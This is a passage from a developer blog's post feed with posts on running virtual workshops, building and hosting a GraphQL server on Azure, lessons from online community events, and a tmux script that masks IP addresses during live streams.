lucky to have a decent (by Australian standards) internet connection at home, a large screen, good hearing and vision, but not everyone is in the same situation. And also, given that it was two days online I was anticipating that at some point the video would lose frames and the quality would drop, I wanted some way to ensure that the attendees would be able to still read what I was presenting.\nPowerPoint I was presenting the slides out of PowerPoint and this gives you some options in how you can improve access to the slides for attendees. If you’re on a Windows machine you can use Office Presentation Services, which allows you to start a presentation and then share a URL to the slides to the attendees. Attendees can then connect in their browser and watch along as you move through a deck, as well as download the slides (if you enable it). Alternatively, if you have a Microsoft 365 account you can use Live Presentations which works similar, but gives you a QR code for the attendees to scan (as well as the URL), live transcription and reactions. The transcription feature even offers the viewer the ability to change the language that the transcription is played in, so if English isn’t their preferred language, they can optimise for their experience.\nThe only downside of this was that all the hard work I’d put in to creating a fancy scene setup in OBS and stung together with NDI so that they still had a connection to the talking head was put aside, but that’s a minor point when it comes to improving the accessibility of content for your audience.\nCode As you might’ve noticed in the screenshot above of my editor, I have a rather random colour pallet in use. I figure that an editor is somewhere I’m spending a lot of time, so why not make it bright and fun, so I switch between a few really whacky themes, but I do appreciate that this isn’t everyone’s preference, we all have the font size just right, the colours that work best for us and windows docked where they need to be. Also, as I mentioned above, the chance of a degraded video quality is high, and you don’t want people to fall behind because they’re dropping frames.\nTo reduce this barrier we can use Visual Studio Live Share which is a service that allows you to setup a remote connection into your editor that anyone can join and collaborate in (or watch if you make it read-only). The best part is that while I might be using VS Code, others can use Visual Studio or just connect in the browser, meaning that people could follow along in their preferred experience, not in what you deem to be optimal. When I was talking with some of the attendees, one made a comment that they found this useful as they could then go exploring the codebase themselves, which I hadn’t thought of as a benefit, but it meant if they wanted a reminder of how we did something earlier, they didn’t need me to swap to a different file, they could just do it themselves.\nAnother idea with Live Share, which we didn’t use this time but I want to try in future, is that attendees can share their editor with the teacher, allowing you to pair through a problem, just like you would do in person by sitting with a student.\nHitting the Ground Running Having run this workshop in person a few times I know that one of the challenges that we always faced is ensuring that people were able to start writing code quickly, and not spending time installing software and getting an environment setup. When you’re in person you can easily sit with someone and work through an error they are receiving, but it’s a lot harder when it’s virtual, so to streamline the process make sure that you have a really comprehensive setup guide that people can follow before you get started. Detail out potential error messages that will come up and how to work through them, so that people can be as ready as possible before getting started.\nAnother option worth exploring (but wasn’t viable for this workshop) is using Visual Studio Codespaces or VS Code Remote Containers. Both of these options allow you to configure the development environment and have it ready to go with all needed dependencies and extensions (for VS Code) so that people don’t need to worry about what version of the runtime do I need? issues. There is a limitation of people either needing an Azure account (since Codespaces isn’t free) or Docker to run a container, but if your tool chain is complex, maybe it’s a small price to pay to save setup complexity.\nAlso, consider recording a welcome video for your attendees. Introduce yourself and the workshop to them, talk to them about what they’ll learn, cover off the setup guide, setup ground rules, etc. so that people are as prepared as they can be coming into day one.\nBe Interactive This is the biggest learning I took away as a teacher, just how much harder interaction is in a virtual workshop. People can be shy and not want to speak up on a call, I can understand that, so it’s up to you as the instructor to foster interaction with participants.\nLook to leverage things like polls or quizzes throughout the workshop so that people can test their knowledge. Avoid asking questions of the floor and instead ask directly to an attendee. These are two things I didn’t do and looking back it was a missed opportunity.\nBut also deviate from “the script” to inject some personality. I changed my VS Code theme throughout the workshop to mix it up and then talked about different themes. I got sidetracked when looking for something in search results and started talking about a random topic instead. My kids pop their heads in because they were at home and bored because it was raining. I joked with one of the attendees who was in the UK, so they were doing the workshop from midnight to 8am about having lunch at 4am is simply weird.\nConclusion Online workshops are hard, much harder than a normal presentation because you are no longer able to sit with your students and just check in with them, but there are things you can do to make it a bit easier.\nThink about how you’re going to feel connected with the attendees. Sure, I might have had an over-engineered setup in place, but it was a bit of fun and injected some of my quirky personality into it.\nThink about how you can improve accessibility. Leverage tools like presenting your slides on a publicly accessible URL and using Live Share for everyone to jump into your editor.\nThink about how you can simplify everyone’s setup experience, remembering that you’re unlikely to be able to see their screen and help them debug, so give them the tools beforehand. Or, if it’s possible, pre-provision an environment with Codespaces or a Dockerfile.\nThink about how to be interactive. I realise now that I wasn’t as interactive as I should’ve been, so it could’ve been a very long two days of people watching PowerPoint and someone code. So, make sure they feel a part of the event.\nLastly, have fun. It’s a long time to be learning but if you’re having fun as a teacher that’ll impart on your students.\n", "id": "2020-07-30-a-guide-to-virtual-workshops" }, { "title": "GraphQL on Azure: Part 2 - dotnet and App Service", "url": "https://www.aaron-powell.com/posts/2020-07-21-graphql-on-azure-part-2-app-service-with-dotnet/", "date": "Tue, 21 Jul 2020 08:16:33 +1000", "tags": [ "azure", "serverless", "azure-functions", "dotnet", "graphql" ], "description": "Let's look at how we can create a dotnet GraphQL server and deploy it to an AppService", "content": "In my introductory post we saw that there are many different ways in which you can host a GraphQL service on Azure and today we’ll take a deeper look at one such option, Azure App Service, by building a GraphQL server using dotnet. If you’re only interested in the Azure deployment, you can jump forward to that section. Also, you’ll find the complete sample on my GitHub.\nGetting Started For our server, we’ll use the graphql-dotnet project, which is one of the most common GraphQL server implementations for dotnet.\nFirst up, we’ll need an ASP.NET Core web application, which we can create with the dotnet cli:\ndotnet new web Next, open the project in an editor and add the NuGet packages we’ll need:\n1 2 3 <PackageReference Include="GraphQL.Server.Core" Version="3.5.0-alpha0046" /> <PackageReference Include="GraphQL.Server.Transports.AspNetCore" Version="3.5.0-alpha0046" /> <PackageReference Include="GraphQL.Server.Transports.AspNetCore.SystemTextJson" Version="3.5.0-alpha0046" /> At the time of writing graphql-dotnet v3 is in preview, we’re going to use that for our server but be aware there may be changes when it is released.\nThese packages will provide us a GraphQL server, along with the middleware needed to wire it up with ASP.NET Core and use System.Text.Json as the JSON seralizer/deserializer (you can use Newtonsoft.Json if you prefer with this package).\nWe’ll also add a package for GraphiQL, the GraphQL UI playground, but it’s not needed or recommended when deploying into production.\n1 <PackageReference Include="GraphQL.Server.Ui.Playground" Version="3.5.0-alpha0046" /> With the packages installed, it’s time to setup the server.\nImplementing a Server There are a few things that we need when it comes to implementing the server, we’re going to need a GraphQL schema, some types that implement that schema and to configure our route engine to support GraphQL’s endpoints. We’ll start by defining the schema that’s going to support our server and for the schema we’ll use a basic trivia app (which I’ve used for a number of GraphQL demos in the past). For the data, we’ll use Open Trivia DB.\n.NET Types First up, we’re going to need some generic .NET types that will represent the underlying data structure for our application. These would be the DTOs (Data Transfer Objects) that we might use in Entity Framework, but we’re just going to run in memory.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 public class Quiz { public string Id { get { return Question.ToLower().Replace(" ", "-"); } } public string Question { get; set; } [JsonPropertyName("correct_answer")] public string CorrectAnswer { get; set; } [JsonPropertyName("incorrect_answers")] public List<string> IncorrectAnswers { get; set; } } As you can see, it’s a fairly generic C# class. We’ve added a few serialization attributes to help converting the JSON to .NET, but otherwise it’s nothing special. It’s also not usable with GraphQL yet and for that, we need to expose the type to a GraphQL schema, and to do that we’ll create a new class that inherits from ObjectGraphType<Quiz> which comes from the GraphQL.Types namespace:\n1 2 3 4 5 6 7 8 9 10 11 12 public class QuizType : ObjectGraphType<Quiz> { public QuizType() { Name = "Quiz"; Description = "A representation of a single quiz."; Field(q => q.Id, nullable: false); Field(q => q.Question, nullable: false); Field(q => q.CorrectAnswer, nullable: false); Field<NonNullGraphType<ListGraphType<NonNullGraphType<StringGraphType>>>>("incorrectAnswers"); } } The Name and Description properties are used provide the documentation for the type, next we use Field to define what we want exposed in the schema and how we want that marked up for the GraphQL type system. We do this for each field of the DTO that we want to expose using a lambda like q => q.Id, or by giving an explicit field name (incorrectAnswers). Here’s also where you control the schema validation information as well, defining the nullability of the fields to match the way GraphQL expects it to be represented. This class would make a GraphQL type representation of:\n1 2 3 4 5 6 type Quiz { id: String! question: String! correctAnswer: String! incorrectAnswers: [String!]! } Finally, we want to expose a way to query our the types in our schema, and for that we’ll need a Query that inherits ObjectGraphType:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 public class TriviaQuery : ObjectGraphType { public TriviaQuery() { Field<NonNullGraphType<ListGraphType<NonNullGraphType<QuizType>>>>("quizzes", resolve: context => { throw new NotImplementedException(); }); Field<NonNullGraphType<QuizType>>("quiz", arguments: new QueryArguments() { new QueryArgument<NonNullGraphType<StringGraphType>> { Name = "id", Description = "id of the quiz" } }, resolve: (context) => { throw new NotImplementedException(); }); } } Right now there is only a single type in our schema, but if you had multiple then the TriviaQuery would have more fields with resolvers to represent them. We’ve also not implemented the resolver, which is how GraphQL gets the data to return, we’ll come back to that a bit later. This class produces the equivalent of the following GraphQL:\n1 2 3 4 type TriviaQuery { quizzes: [Quiz!]! quiz(id: String!): Quiz! } Creating a GraphQL Schema With the DTO type, GraphQL type and Query type defined, we can now implement a schema to be used on the server:\n1 2 3 4 5 6 7 public class TriviaSchema : Schema { public TriviaSchema(TriviaQuery query) { Query = query; } } Here we would also have mutations and subscriptions, but we’re not using them for this demo.\nWiring up the Server For the Server we integrate with the ASP.NET Core pipeline, meaning that we need to setup some services for the Dependency Injection framework. Open up Startup.cs and add update the ConfigureServices:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 public void ConfigureServices(IServiceCollection services) { services.AddTransient<HttpClient>(); services.AddSingleton<QuizData>(); services.AddSingleton<TriviaQuery>(); services.AddSingleton<ISchema, TriviaSchema>(); services.AddGraphQL(options => { options.EnableMetrics = true; options.ExposeExceptions = true; }) .AddSystemTextJson(); } The most important part of the configuration is lines 8 - 13, where the GraphQL server is setup and we’re defining the JSON seralizer, System.Text.Json. All the lines above are defining dependencies that will be injected to other types, but there’s a new type we’ve not seen before, QuizData. This type is just used to provide access to the data store that we’re using (we’re just doing in-memory storage using data queried from Open Trivia DB), so I’ll skip its implementation (you can see it on GitHub).\nWith the data store available, we can update TriviaQuery to consume the data store and use it in the resolvers:\n1 2 3 4 5 6 7 8 9 10 11 12 public class TriviaQuery : ObjectGraphType { public TriviaQuery(QuizData data) { Field<NonNullGraphType<ListGraphType<NonNullGraphType<QuizType>>>>("quizzes", resolve: context => data.Quizzes); Field<NonNullGraphType<QuizType>>("quiz", arguments: new QueryArguments() { new QueryArgument<NonNullGraphType<StringGraphType>> { Name = "id", Description = "id of the quiz" } }, resolve: (context) => data.FindById(context.GetArgument<string>("id"))); } } Once the services are defined we can add the routing in:\n1 2 3 4 5 6 7 8 9 10 11 12 public void Configure(IApplicationBuilder app, IWebHostEnvironment env) { if (env.IsDevelopment()) { app.UseDeveloperExceptionPage(); app.UseGraphQLPlayground(); } app.UseRouting(); app.UseGraphQL<ISchema>(); } I’ve put the inclusion GraphiQL. within the development environment check as that’d be how you’d want to do it for a real app, but in the demo on GitHub I include it every time.\nNow, if we can launch our application, navigate to https://localhost:5001/ui/playground and run the queries to get some data back.\nDeploying to App Service With all the code complete, let’s look at deploying it to Azure. For this, we’ll use a standard Azure App Service running the latest .NET Core (3.1 at time of writing) on Windows. We don’t need to do anything special for the App Service, it’s already optimised to run an ASP.NET Core application, which is all this really is. If we were using a different runtime, like Node.js, we’d follow the standard setup for a Node.js App Service.\nTo deploy, we’ll use GitHub Actions, and you’ll find docs on how to do that already written. You’ll find the workflow file I’ve used in the GitHub repo.\nWith a workflow committed and pushed to GitHub and our App Service waiting, the Action will run and our application will be deployed. The demo I created is here.\nConclusion Throughout this post we’ve taken a look at how we can create a GraphQL server running on ASP.NET Core using graphql-dotnet and deploy it to an Azure App Service.\nWhen it comes to the Azure side of things, there’s nothing different we have to do to run the GraphQL server in an App Service than any other ASP.NET Core application, as graphql-dotnet is implemented to leverage all the features of ASP.NET Core seamlessly.\nAgain, you’ll find the complete sample on my GitHub for you to play around with yourself.\n", "id": "2020-07-21-graphql-on-azure-part-2-app-service-with-dotnet" }, { "title": "Online Events, Experience From Three Perspectives", "url": "https://www.aaron-powell.com/posts/2020-07-20-online-events-experience-from-three-perspectives/", "date": "Mon, 20 Jul 2020 10:09:33 +1000", "tags": [ "public-speaking", "conference", "user-group" ], "description": "Online events are the way of the times, let's touch on a few things I've learnt from them so far", "content": "The world has moved to online events for the time being, and over the past few months I’ve attended and spoken at a number of user groups, conferences and solo live streams so I thought I’d share some insights on what I’ve learnt from them, so in this post I want to share the views as an attendee or speaker or organiser. My goal here isn’t to discuss all the complex tool chains you can setup with NDI, OBS and thousands of dollars’ worth of hardware, instead I want to look at things that I’ve seen working to make a community work in an online space.\nHosting Online This is an obvious starting place for us, what are you going to use to host the online event? There are a few factors to consider in this space, but I think the most important first decision is what style of event do you want to host and there are two styles I’ve seen used, conference call or broadcast.\nConference Call Style Let’s talk about this style of event first as it is what people have the most experience with, there’s a good chance you’re doing one or more of these a day already! Tools like Microsoft Teams and Zoom play nicely in this space and have free tiers (or you “know someone with a paid account”) to get an event setup.\nAs an attendee they are a bit of a mixed bag. Often you’ll need to install a desktop/mobile app to use them, rather than just relying on your browser and this can be a bit of a turn off for some people if they can’t install something on their device or have concerns about the invasiveness nature of some of these apps.\nOnce you’re in though, they are a good attendee experience. You can see each other, you can chat, and if feels a bit like you’re socialising with others, even if you’re all behind cameras. But this is a double-edged sword from a speaker and organiser perspective.\nSince conference call tools tend not to have an owner for the event (generally) but are more a communal space, you can end up with the same faux pas of the common conference call, people not muting and limited control over attendee contributions. I was attending a meetup the other day and another attendee was multi-tasking by watching something else, but not on mute, so their audio bleared over the presenter and the hosts couldn’t do anything about it but constantly calling out to the person to mute themselves. But let’s leave moderation to the side for now as there’s a bigger piece I want discuss there.\nWhat about being a speaker? I really like about presenting on conference call style events because you can see the audience reactions. Presenting online is hugely difference to presenting in person and the main thing I miss is being able to see the audience reactions. Are they losing focus? playing on their phones? falling asleep? Being able to get this sort of feedback helps adjust how you present and even if you can only see a few of the attendee’s cameras it can be really useful to boost someone’s confidence. Ultimately, it feels like it’s more personal when presenting on a conference call style event.\nBroadcast Style This brings me to the other style of online events, broadcast style. Tools that fall into this category are ones like Microsoft Teams Live, YouTube Live and Twitch, and sometimes a middleperson broadcast platform will be used like StreamYard or Restream.\nFrom the attendee perspective these can toe the line on being an engaging learning session and a dreaded webinar, you know the one I mean where the presenter is so far removed from the audience that you may as well be doing something else because it’s just downright boring and an engaging experience. For proof that this can work as a community platform you need to look no further than Twitch. While Twitch is primarily used by gamers, there’s plenty of developer streams out there too, with more seeming to pop up every week.\nAs an organiser looking to do broadcast style I can’t recommend more highly than using a service like StreamYard or Restream. These platforms offer a web interface that you run your event via and push out to anywhere that supports RTMP and this is what services like Twitch or YouTube Live consume. The two services that I’ve mentioned both have free tiers that are adequate enough for what most community events need, offering multiple presenters, screenshare with picture-in-picture and a backstage area without the need to dive into tools like OBS and learning video production. Paid plans focusing on features like removing the services watermark, customising the scenes more and streaming to more locations at once.\nFor a user group, being able to stream out to a single location is more than adequate as it helps you focus your community around one place (useful for ongoing discussions post-stream) and the same goes for solo streaming. I personally stream using Restream to Twitch, but also to YouTube Live as it saves the video to my YouTube channel. And this is another benefit of broadcast style, they (generally) make it easy to get a video export of the event to upload somewhere if it’s not automatically recorded.\nThe primary drawback with middleperson broadcast services is that there is additional lag between the presenter and the audience, so this can make engaging with the audience a bit trickier. So, it’s best to play around with destination platforms a bit, but I’ve found Twitch is the closest to real-time.\nAs a speaker, this is my preferred style of event. To present I don’t have to install anything new, it’s just a browser which I screen share/allow my camera access to and I can get down to presenting. Yes, it’s true that you lose the ability to “see” the audience, since there’s no other video/audio on the feed (likely just the organisers), but that can help reduce nerves if you’re not confident public speaking as you can’t see anyone. I have more confidence in that I’m not going to get interrupted while speaking and can engage with the audience as I desire.\nI will say this though, landing a joke when you’ve got no feedback other than a delayed chat… that’s hard!\nBeing a Community Something that is really important to remember when going down the path of online events is that you’re a community, whether it’s a user group, conference or your own stream, and that community is the most important part. These are places not just where people learn about something, they are also places where people catch up with friends so it’s important to think about how you’ll build that in an online space.\nModeration I touched on this briefly above, but an important thing to look at when doing online events is how you’re going to do moderation. When you’re doing events in a conference call style this is inherently challenging, as anyone who does conference calls to work can attest. You’ll have people who forget to mute themselves, people forgetting they have the camera on when they do whatever, people wanting to jump in and ask a question as soon as it pops into their mind or worse, someone violating your Code of Conduct.\nOf all the conference call platforms I’ve used, I’m yet to find one that has decent moderation tools that allow you mute or eject people easily, so this is something that you really need to be on top of as an organiser, how do you create a safe online space, set the stage for the speaker to be comfortable and successful and ensure that the audience is respectful. Thankfully, the worst I’ve been involved with is people forgetting to mute themselves and this results in the speaker/organiser having to be louder and shout-ier than them, but to a degree this reminds me of in-person events when people forget how loud they can be!\nAs an organiser, to be successful you need to make sure that you are actively driving the event, welcome everyone to the event, remind everyone of the expectation you have from them (including the Code of Conduct) and be on top of the chat. You’ll also need to be confident to take drastic steps if necessary, like terminating the event if something did become toxic. You’ll also want to work with your speakers beforehand to make sure they understand the role you’ll play and how you’ll be tackling things like moderation and audience participation. If they want to do Q&A ad-hoc, let the speaker roll with it, otherwise keep an eye on the chat to bring up questions at the end.\nBroadcast platforms make moderation a lot easier, first off, you don’t have audience audio/video to contend with, so you don’t have the unmuted problem to deal with. Also, because they are a bit more asynchronous in their communication, it’s a lot easier as a speaker to delay responding to incoming questions until you’re ready. Some tools even provide you the ability to create a backlog of questions that you can display on-screen for the speaker and audience, which is really helpful as too often we as speakers forget to repeat a question before answering it.\nThe chat platforms on broadcast platforms are also designed to have moderation on them, whether it’s bots, spam filtering or just giving you the ability to delete messages and mute people. As an organiser this sort of thing helps to make sure that the values of your community are upheld and enforceable.\nExpanding Your Reach User groups and conferences are a good example of leveraging privilege, I’m lucky enough to work in the Sydney CBD (well, did!) and meetups are located there so I could easily attend them. But they tend to kick off around 6pm to catch people before they go home, and if you don’t work in a short trip to the CBD, you’re probably not going to make them. Or, if you have family commitments (I have 2 young kids), staying out for a meetup can mean that you sacrifice time with the family. The same goes for conferences, there’s cost to attend, time away from work, travel costs if they aren’t in your city, and all of this means that there’s a lot of people who might want to attend but simply can’t.\nBeing online changes this dynamic, especially while we’re all working from home, as you’ve removed one of the greatest barriers - travel time. Now your event is accessible to more people and improving availability of content is a win for all.\nMy friend Lars put up a poll the other day about online event times:\nNow that a lot of people are working from home, what is the best time for you to attend an online meetup?\n— Lars Klint | 🚜🥑📹 (@larsklint) July 14, 2020 I’ll admit, I was surprised by the response, that people tended to prefer events at the “usual user group time”. The reason that I found this interesting is that it means that the second barrier isn’t really a concern to as many respondents as I expected. For user groups I’ve attended recently, I’ve seen start times ranging from 5.30pm through to 7.30pm and my preference is towards the later side of the equation as this has meant I got time with my kids and wife from when work ended to the event started.\nAs an organiser, timing is something that you want to engage with your community on, what works for the majority and what new people can you attract with by having different options of starting time. And this is where having a platform that records content for you is a bonus, as you then have the event available for those who missed it without much additional effort on the organisers.\nBut as an attendee, I have a whole new world of events I can look to engage with. Now it’s easy to jump on a user group in the US (which happen through my lunchtime generally) and watch on to learn from people elsewhere in the world but still on the content that I’m interested in.\nMore Speakers This is a bit of an extension on the previous point, by lowering the barrier to attend through reduced travel time and/or more flexible start times, you open up to having people outside the usual radius speak. Case in point, last month’s ALT.NET Sydney had someone present from Perth.\nNow you’re able to bring a wider set of voices to your event because you’re only really constrained by what people find to be acceptable waking hours and there’s no reason someone in Europe couldn’t present in Sydney, or someone in Australia can’t speak in the US. So as an organiser you can start looking through your broader networks and thinking of people who you’ve always wanted to have speak but it’s never worked because they were elsewhere in the world.\nAs an attendee, this really excites me as now I can hear from and engage with people anywhere, learning from them directly in a real-time format, not only having the option to watch it online after the fact.\nKeeping the Conversation Going The biggest loss from moving from in person events to online events is losing the hallway track. I was discussing this a few weeks ago with some colleagues and one of them remarked that the most successful online events they’ve seen are the ones that don’t focus on the hour/day/week that the event happens, but instead foster an ongoing community space. Setting up a Slack workspace or Discord server in which the speakers can spend time with the attendees and do Q&A, while not replacing the hallway track, does go part of the way to giving people more of a community feeling to it.\nAnother benefit of setting up a server like this is that you can start building a community that’s broader than just the one night a month or one day a year that your event happens, it helps give people a place that they can continue to converse and share their knowledge.\nConclusion We’re going to be doing online events for a while longer, it’s part of the world we now live in and while I don’t feel these are a true replacement for in person events there’s very much a place which they belong.\nFor me as an organiser it means you need to go back to the core of what makes a community, fostering that desire to get together and talk about whatever the topic might be. The tech that you use does play a role in making the events successful, so think about what options you have available and how they fit the kind of event you want to run. Conference call style are great for having that person-to-person feel, but they can struggle with moderation, especially at scale. On the other side broadcast style are easier to moderate but can feel cold.\nOnline events also open up a range of new possibilities for how you can engage with your community, no longer are you bound by the usual time constraints of getting people before they go home, instead maybe it’s possible to be more flexible on when to run so it fits your community.\nAnd don’t forget the value in building the community, giving people a space where they can still talk with the speakers and each other, even beyond just the time and place of the event.\nAs I said at the start, this wasn’t a “here’s the tech” style post, but if you’re looking for ideas here’s a few posts:\nOnline meetups with OBS and Skype Free Microsoft Teams for communities: getting started Inject OBS Studio into Microsoft Teams Have you been attending online events? What have you seen that’s working, or not working well? I’d love to hear your thoughts.\n", "id": "2020-07-20-online-events-experience-from-three-perspectives" }, { "title": "GraphQL on Azure: Part 1 - Getting Started", "url": "https://www.aaron-powell.com/posts/2020-07-13-graphql-on-azure-part-1-getting-started/", "date": "Mon, 13 Jul 2020 14:45:30 +1000", "tags": [ "azure", "serverless", "azure-functions", "graphql" ], "description": "Let's get started looking at GraphQL on Azure", "content": "I’ve done a few posts recently around using GraphQL, especially with Azure Static Web Apps, and also on some recent streams. This has led to some questions coming my way around the best way to use GraphQL with Azure.\nLet me start by saying that I’m by no means a GraphQL expert. In fact, I’ve been quite skeptical of GraphQL over the years.\nIs it just me or does GraphQL look a lot like what OData https://t.co/0P8moaJp6S tried to do? #sydjs\n— Aaron Powell (@slace) December 16, 2015 This tweet here was my initial observation when I first saw it presented back in 2015 (and now I use it to poke fun at friends now) and I still this there are some metis in the comparison, even if it’s not 100% valid.\nSo, I am by no means a GraphQL expert, meaning that in this series I want to share what my perspective is as I come to looking at how to be do GraphQL with Azure, and in this post we’ll look at how to get started with it.\nRunning GraphQL on Azure This question has come my way a few times, “how do you run GraphQL on Azure?” and like any good problem, the answer to it is a solid it depends.\nWhen I’ve started to unpack the problem with people it comes down to wanting to find a service on Azure that does GraphQL, in the same way that you can use something like AWS Amplify to create a GraphQL endpoint for an application. Presently, Azure doesn’t have this as a service offering, and to have GraphQL as a service sounds is a tricky proposition to me because GraphQL defines how you interface as a client to your backend, but not how your backend works. This is an important thing to understand because the way you’d implement GraphQL would depend on what your underlying data store is, is it Azure SQL or CosmosDB? maybe it’s Table Storage, or a combination of several storage models.\nSo for me the question is really about how you run a GraphQL server and in my mind this leaves two types of projects; one is that it’s a completely new system you’re building with no relationship to any existing databases or backends that you’ve got* or two you’re looking at how to expose your existing backend in a way other than REST.\n*I want to point out that I’m somewhat stretching the example here. Even in a completely new system it’s unlikely you’d have zero integrations to existing systems, I’m more point out the two different ends of the spectrum.\nIf you’re in the first bucket, the world is your oyster, but you have the potential of choice paralysis, there’s no single thing to choose from in Azure, meaning you have to make a lot of decisions to get up and running with GraphQL. This is where having a service that provides you a GraphQL interface over a predefined data source would work really nicely and if you’re looking for this solution I’d love to chat more to provide that feedback to our product teams (you’ll find my contact info on my About page). Whereas if you’re in the second, the flexibility of not having to conform to an existing service design means it’s easier to integrate into. What this means is that you need some way to host a GraphQL server, because when it comes down to it, that’s the core piece of infrastructure you’re going to need, the rest is just plumbing between the queries/mutations/subscriptions and where your data lives.\nHosting a GraphQL Server There are implementations of GraphQL for lots of languages so whether you’re a .NET or JavaScript dev, Python or PHP, there’s going to be an option for you do implement a GraphQL server in whatever language you desire.\nLet’s take a look at the options that we have available to us in Azure.\nAzure Virtual Machines Azure Virtual Machines are a natural first step, they give us a really flexible hosting option, you are responsible for the infrastructure so you can run whatever you need to run on it. Ultimately though, a VM has some drawbacks, you’re responsible for the infrastructure security like patching the host OS, locking down firewalls and ports, etc..\nPersonally, I would skip a VM as the management overhead outweighs the flexibility.\nContainer Solutions The next option to look at is deploying a GraphQL server within a Docker container. Azure Kubernetes Service (AKS) would be where you’d want to look if you’re looking to include GraphQL within a larger Kubernetes solution or wanting to use Kubernetes as a management platform for your server. This might be a bit of an overkill if it’s a standalone server, but worthwhile if it’s part of a broader solution.\nMy perferred container option would be Azure Web Apps for Containers. This is an alternative to the standard App Service (or App Service on Linux) but useful if you’re runtime isn’t one of the supported ones (runtimes like .NET, Node, PHP, etc.). App Service is a great platform to host on, it gives you plenty of management over the environment that you’re running in, but keeps it very much in a PaaS (Platform as a Service) model, so you don’t have to worry about patching the host OS, runtime upgrades, etc., you just consume it. You have the benefit of being able to scale both up (bigger machines) and out (more machines), building on top of an backend system allows for a lot of scale in the right way.\nAzure Functions App Service isn’t the only way to run a Node.js GraphQL service, and this leads to my preference, Azure Functions with Apollo Server. The reason I like Functions for GraphQL is that I feel GraphQL fits nicely in the Serverless design model nicely (not to say it doesn’t fit others) and thus Functions is the right platform for it. If the kinds of use cases that you’re designing your API around fit with the notion of the on-demand scale that Serverless provides, but you do have a risk of performance impact due to cold start delays (which can be addressed with Always On plans).\nSummary We’re just getting started on our journey into running GraphQL on Azure. In this post we touched on the underlying services that we might want to look at when it comes to looking to host a GraphQL server, with my pick being Azure Functions if you’re doing a JavaScript implementation, App Service and App Service for Containers for everything else.\nAs we progress through the series we’ll look at each piece that’s important when it comes to hosting GraphQL on Azure, and if there’s something specific you want me to drill down into in more details, please let me know.\n", "id": "2020-07-13-graphql-on-azure-part-1-getting-started" }, { "title": "Toggling Network Info in tmux", "url": "https://www.aaron-powell.com/posts/2020-06-29-toggling-network-info-in-tmux/", "date": "Mon, 29 Jun 2020 16:10:08 +1000", "tags": [ "random" ], "description": "A little tweak to my tmux setup for privacy needs", "content": "I’ve been doing a bit of live streaming recently (you can catch me on Twitch or YouTube) which means that I’m sharing my desktop on recordings more often and I like doing this because, as I’ve spent a bunch of time setting up my terminal (read more here).\nRecently, my colleague Brian Clark pinged me about something he’d noticed on a recent stream, that in my terminal there are some IP addresses (left side of my tmux status bar) and he asked if they were real. And that’s when I realised that I’ve been publishing my home IP address on each stream or video I have published over the last few months! 😂\nNow, to the best of my knowledge this hasn’t been a problem as I haven’t been hacked (to the best of my knowledge!), but still, it’s probably not a great idea to do that, so I quickly reset the modem to get a new external IP but it left the question of how to solve this going forward? The obvious one is to just remove that from the status bar, but I do like having it there when I’m not streaming (it’s useful), so what’s the next option? Well, I could make an overlay to mask it, but that’d only work on stream, what if I’m at an event presenting, they aren’t going to want my overlay hack are they? It’s time for something more creative.\nAnatomy of my IP info The IP information on display generated by this script which is run in context of the tmux status bar, and is just a few commands to get local and remote IP information, and is included using my .tmux.config.\nSo, this is just a shell script, meaning that I can do anything I want to with it, and that got my thinking “how can I detect when to disable it?” and the time I (most) want it disabled is when I have OBS running for a stream. But OBS runs in Windows and tmux is in WSL, so how do we detect it?\nDetecting Windows processes in WSL You’re probably familiar with Windows Task Manager to find processes, but did you know there’s a command line equivalent, tasklist.exe? and WSL ships with Windows interop in the box, which means from WSL I can just run tasklist.exe and get all running Windows tasks! This output can then be passed straight through to grep and we can do a conditional check like so:\n1 2 3 4 5 if tasklist.exe | grep -q 'obs'; then echo "OBS is running" else echo "OBS isn't running" fi Now it’s just a case of swapping in some fake IP addresses when OBS is running and we’re all set!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 if tasklist.exe | grep 'obs' -q; then echo -n "🏠 #[fg=colour197]192.168.0.0 #[fg=black]|#[fg=colour197] 📡 255.255.255.256" else # Internal IP IP=$(hostname -I | awk {'print $1}') PUBLIC_IP=$(curl -4 ifconfig.co) if [[ "$PUBLIC_IP" = ";; connection timed out; no servers could be reached" ]]; then PUBLIC_IP="Not Available" elif [[ "$PUBLIC_IP" = "" ]]; then PUBLIC_IP="No external access" else PUBLIC_IP=$(curl -4 ifconfig.co) fi echo -n "🏠 #[fg=colour197]$IP #[fg=black]|#[fg=colour197] 📡 $PUBLIC_IP" fi Bonus round: Set fake network info whenever you want This works great, it targets the main scenario of when my IP addresses are being leaked, but it doesn’t cover them all, like when I’m presenting at a user group or conference and I’m not using OBS to produce the output stream. In those cases I need some other way to fake out the IP addresses.\nTo do this I wanted to have a key binding in tmux that I could hit which would set something that the script could then run and test against.\nThe first step is to create a custom option in tmux, and I couldn’t find any documentation on this but through trail and error, plus reading a lot of other tmux configs, it turns out that you prefix the option with @, so we’ll put that in our .tmux.config:\n1 set -g @show-network true set is an alias for set-option, which is run against tmux (if it wasn’t in the .tmux.config you’d do tmux set-option) and the -g flag says we’re setting this globally on all tmux windows (you can use -w for the current window, but I want it consistent on all), then we give it a name, @show-network and an initial value true.\nNow, for the key binding we’ll use bind (or bind-key), provide it the key to bind to and what to do when its triggered:\n1 bind o run-shell "if ! $(tmux show-option -gqv @show-network); then tmux set -g @show-network true; else tmux set -g @show-network false; fi" For this, we’re binding to o as the key, meaning it’s modifier + o which, for me, is Ctrl + b, o, but choose whatever you want/have free. This binding will trigger run-shell, to execute either a shell script or an inline script (which I do). The script checks for to current @show-network value and flips it. You can probably write this shorter, but the verboseness means I can remember what it does in the future.\nLastly, let’s update the script that shows the network status:\n1 2 3 4 5 if $(tasklist.exe | grep 'obs' -q) || ! $(tmux show-option -gqv @show-network); then echo -n "🏠 #[fg=colour197]192.168.0.0 #[fg=black]|#[fg=colour197] 📡 255.255.255.256" else # snip fi Conclusion This was a fun little dig into how you can customise tmux to fit your needs. With a few edits to the script we can detect processes running that we want to hide the IP info from, and it turned out to be possible to add our options fire off a keyboard command to hide it as well.\nThe scripts have been updated on my GitHub repo if you want to grab them.\n", "id": "2020-06-29-toggling-network-info-in-tmux" }, { "title": "New Stream - Series Server to Serverless", "url": "https://www.aaron-powell.com/posts/2020-06-20-new-stream-series-server-to-serverless/", "date": "Sat, 20 Jun 2020 19:10:44 +1000", "tags": [ "dotnet", "serverless", "azure-functions", "azure" ], "description": "Kicking off a new live stream series on converting from 